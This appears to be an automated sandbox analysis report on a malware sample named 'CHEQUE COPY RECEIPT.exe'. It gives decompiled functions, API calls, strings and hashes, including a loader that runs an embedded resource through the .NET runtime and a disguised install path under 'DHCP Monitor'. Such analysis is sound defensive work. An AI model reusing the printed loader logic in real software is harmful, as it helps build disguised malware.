Function 0040216B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040216B(void* __eflags) {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x90) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405C52( *(_t111 - 0xc)) == 0) {
					E00402BCE(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\alfons\\AppData\\Local\\Temp");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
						_t95 =  *((intOrPtr*)(_t111 - 0x34));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}

APIs

CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00402230

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 123533781-1943935188
Opcode ID: d1646d0aa5383454272ae2365f2e539284722c37dfd4dd564290cd80718c831a
Instruction ID: b205fa0f6c371e5dc37930ac793058e6edb3c03a2887874d4a759486fbbeee3c
Opcode Fuzzy Hash: d1646d0aa5383454272ae2365f2e539284722c37dfd4dd564290cd80718c831a
Instruction Fuzzy Hash: F5511671A00208AFCB50DFE4CA88E9D7BB6EF48314F2041BAF515EB2D1DA799981CB14

Uniqueness

Uniqueness Score: -1.00%

Function 004052E8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004052E8(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42a8a4 != _t16) {
							_push(_t16);
							_push(6);
							 *0x42a8a4 = _t16;
							E00404CA4();
						}
						L11:
						return CallWindowProcA( *0x42a8ac, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404C24(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E0040431D(0x413);
				return 0;
			}

APIs

IsWindowVisible.USER32(?), ref: 00405317
CallWindowProcA.USER32 ref: 00405368

Part of subcall function 0040431D: SendMessageA.USER32 ref: 0040432F

Strings

, xrefs: 004052F8

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 0a098fed05280c4c25b3dc975a767402e9790e492dc4fcfe2bcc4ad60f2532f9
Instruction ID: 61c005e653dc5e4fe91c717b668e6c159ed787b7c92b66bd7724375ff0c78d11
Opcode Fuzzy Hash: 0a098fed05280c4c25b3dc975a767402e9790e492dc4fcfe2bcc4ad60f2532f9
Instruction Fuzzy Hash: B5018471200608EFDF206F11DD80AAB3765EB84795F185137FE047A1D1C7BA8C629E2E

Uniqueness

Uniqueness Score: -1.00%

Function 00406134, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00406134(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E004060D3(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00406142
0x00406144
0x0040615c
0x00406161
0x00406166
0x004061a3
0x004061a3
0x00406168
0x0040617a
0x00406185
0x0040618b
0x00406195
0x00000000
0x00000000
0x00406195
0x004061a8

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,0042A098,?,?,?,00000002,Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,?,004063E9,80000002), ref: 0040617A
RegCloseKey.ADVAPI32(?,?,004063E9,80000002,Software\Microsoft\Windows\CurrentVersion,Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,?,0042A098), ref: 00406185

Strings

Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file., xrefs: 00406137, 0040616B

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseQueryValue
String ID: Error opening file for writing: C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.
API String ID: 3356406503-1862136622
Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
Instruction ID: abb308f8f7f3d79eba5fb0d9b58611e130e20d6dfe1a02acdbc1ca07f32112a5
Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
Instruction Fuzzy Hash: CA01BC72500209ABEF22CF60CD09FDB3FA8EF45364F01403AF916E6191D278C964CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004058EC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004058EC(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c0c0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c0c0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x004058f5
0x00405915
0x0040591d
0x00405922
0x00000000
0x00405928
0x0040592c

APIs

CreateProcessA.KERNEL32 ref: 00405915
CloseHandle.KERNEL32(?), ref: 00405922

Strings

Error launching installer, xrefs: 004058FF

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: a7bb890bbc051f912148fc8d3d355e884b0c5c28e790f435a07fb0e3f2a9ef73
Instruction ID: c507ec532ebc7345b5619acd619b8ed9e71e93050b60d9e59510cdc0b01a46da
Opcode Fuzzy Hash: a7bb890bbc051f912148fc8d3d355e884b0c5c28e790f435a07fb0e3f2a9ef73
Instruction Fuzzy Hash: 52E0BFF5600209BFEB109BA5ED45F7F77ADFB04608F404525BD50F2150D77499158A78

Uniqueness

Uniqueness Score: -1.00%

Function 00405C2C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C2C(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x00405c2d
0x00405c37
0x00405c39
0x00405c40
0x00405c48
0x00000000
0x00000000
0x00000000
0x00405c48
0x00405c4a
0x00405c4f

APIs

lstrlenA.KERNEL32(80000000,C:\Program Files (x86)\DHCP Monitor,00402F5D,C:\Program Files (x86)\DHCP Monitor,C:\Program Files (x86)\DHCP Monitor,C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe,C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe,80000000,00000003), ref: 00405C32
CharPrevA.USER32(80000000,00000000,80000000,C:\Program Files (x86)\DHCP Monitor,00402F5D,C:\Program Files (x86)\DHCP Monitor,C:\Program Files (x86)\DHCP Monitor,C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe,C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe,80000000,00000003), ref: 00405C40

Strings

C:\Program Files (x86)\DHCP Monitor, xrefs: 00405C2C

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrlen
String ID: C:\Program Files (x86)\DHCP Monitor
API String ID: 2709904686-2806157900
Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
Instruction ID: 4ba3b1558e7d02da59ab85be258a456d7b40e7fb12288d653d4debc9d62610ac
Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
Instruction Fuzzy Hash: 2FD0A76240CA706EF30366108C00B8F6A48DF13301F0900A6F081A2190C3BC4C424BFD

Uniqueness

Uniqueness Score: -1.00%

Function 00405D4B, Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D4B(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5B
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D73
CharNextA.USER32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D84
lstrlenA.KERNEL32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8D

Memory Dump Source

Source File: 0000000A.00000002.497857239.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.497842915.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.497939295.0000000000408000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.498008435.000000000040A000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498066194.0000000000415000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498090133.000000000041D000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498134401.000000000042C000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498160728.0000000000435000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.498190729.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
Instruction ID: 0c063e539c4a2d6313fdce3eb9328f18231664df77b923cface8765f2046746d
Opcode Fuzzy Hash: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
Instruction Fuzzy Hash: 0AF0F632104914FFCB02DFA4DD04D9FBBA8EF46350B2580BAE840F7220D634DE019BA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: CHEQUE COPY RECEIPT.exe PID: 1060 Parent PID: 5364 CHEQUE COPY RECEIPT.exeCOMMON

Executed Functions

Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}

0x00401e22
0x00401e28

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22

Memory Dump Source

Source File: 0000000C.00000002.281769166.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00401489, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401489() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}

0x0040149f
0x004014a5
0x004014a9
0x004014ec
0x004014ee
0x004014ee
0x004014b7
0x004014bb
0x004014c7
0x004014cd
0x004014d3
0x004014d8
0x004014e0
0x004014e0
0x004014d8
0x004014e6
0x00000000

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD

Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037

FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
ExitProcess.KERNEL32 ref: 004014EE

Strings

v4.0.30319, xrefs: 00401053

Memory Dump Source

Source File: 0000000C.00000002.281769166.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
String ID: v4.0.30319
API String ID: 2372384083-3152434051
Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679

Uniqueness

Uniqueness Score: -1.00%

Function 04D6B6C0, Relevance: 6.1, APIs: 4, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.284609810.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 28b879a0ee1b9b1f7067645b3ab1fc24ac26538abd0ea25a0d8bce6ff61b0c83
Instruction ID: 3ccac67c6e8d0156a0be3e83fc7356171c47b1eca2e4fdace187cc5c4fa52877
Opcode Fuzzy Hash: 28b879a0ee1b9b1f7067645b3ab1fc24ac26538abd0ea25a0d8bce6ff61b0c83
Instruction Fuzzy Hash: F95155B49003498FDB10CFA9D6887DEBBF0EF48314F24845AD41AA7360C774A944CF66

Uniqueness

Uniqueness Score: -1.00%

Function 04D6B6CB, Relevance: 6.1, APIs: 4, Instructions: 123threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 04D6B730
GetCurrentThread.KERNEL32 ref: 04D6B76D
GetCurrentProcess.KERNEL32 ref: 04D6B7AA
GetCurrentThreadId.KERNEL32 ref: 04D6B803

Memory Dump Source

Source File: 0000000C.00000002.284609810.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: b07e861416d81466d9b67b618a430a68afbdfc12c838acfe05e35d313cc53c18
Instruction ID: 5a9d86b1491a28206e59096cb3fe57cfb7025dcc5d726faec75e5fe659d6c46c
Opcode Fuzzy Hash: b07e861416d81466d9b67b618a430a68afbdfc12c838acfe05e35d313cc53c18
Instruction Fuzzy Hash: B95144B49003098FDB10CFAAD6887DEBBF0FB48314F24845AE01AA7360C774A944CF66

Uniqueness

Uniqueness Score: -1.00%

Function 04D6B6D0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 04D6B730
GetCurrentThread.KERNEL32 ref: 04D6B76D
GetCurrentProcess.KERNEL32 ref: 04D6B7AA
GetCurrentThreadId.KERNEL32 ref: 04D6B803

Memory Dump Source

Source File: 0000000C.00000002.284609810.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 36193e800cda6d9160bc55c073a0229572b391e915d853579820bb0420bf4e6e
Instruction ID: e0c84d4d8c304957f120e29c4c1a7fa07385fc61f21a4ac0b8b3f69a232f7081
Opcode Fuzzy Hash: 36193e800cda6d9160bc55c073a0229572b391e915d853579820bb0420bf4e6e
Instruction Fuzzy Hash: 8B5145B49003498FDB14CFAAC648B9EBBF1FF48314F24855AE41AA7360D774A944CF66

Uniqueness

Uniqueness Score: -1.00%

Function 004055C5, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004055C5(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E0040ACF0(_t18, _t19, _t12);
					}
					E00403E03(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}

0x004055c5
0x004055cf
0x004055d3
0x004055e4
0x004055e8
0x004055ed
0x004055f3
0x004055f8
0x004055fd
0x00405602
0x00405609
0x004055d5
0x004055d5
0x004055d5
0x00405614

APIs

GetEnvironmentStringsW.KERNEL32 ref: 004055C9
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609

Memory Dump Source

Source File: 0000000C.00000002.281769166.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD

Uniqueness

Uniqueness Score: -1.00%

Function 050617E0, Relevance: 2.0, APIs: 1, Instructions: 517COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.285162526.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7886acf9b39c01820049d10b67f10ac3b7984c9b161c5367e0a0741880ea838
Instruction ID: 8deb44eea350af197c7b0c41d27069489da51f69567abf0eca46c4dbf2b054c6
Opcode Fuzzy Hash: d7886acf9b39c01820049d10b67f10ac3b7984c9b161c5367e0a0741880ea838
Instruction Fuzzy Hash: 57226F78F04207CFDB54CB98E588ABEBBB2FF89350F148556D512AB365C734A881CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04D693E8, Relevance: 1.7, APIs: 1, Instructions: 194COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 04D6962E

Memory Dump Source

Source File: 0000000C.00000002.284609810.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 31f70de015570f2e1ab8baf2fa815e0f92e16b8d042efe0a3e21e1665a132de9
Instruction ID: f20f9ab9f14e6561143c2ad9102edeb07ca388a87ab868ccd4ef29c04e7c67e9
Opcode Fuzzy Hash: 31f70de015570f2e1ab8baf2fa815e0f92e16b8d042efe0a3e21e1665a132de9
Instruction Fuzzy Hash: B67132B0A00B058FD764DF6AD05475ABBF2BF88314F008A6DE58AD7A40DB35F845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04D6FBA3, Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.284609810.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8ac8ba9153295e93241444fca4506b46e6911bc7ae79a3357425c906f17ab37
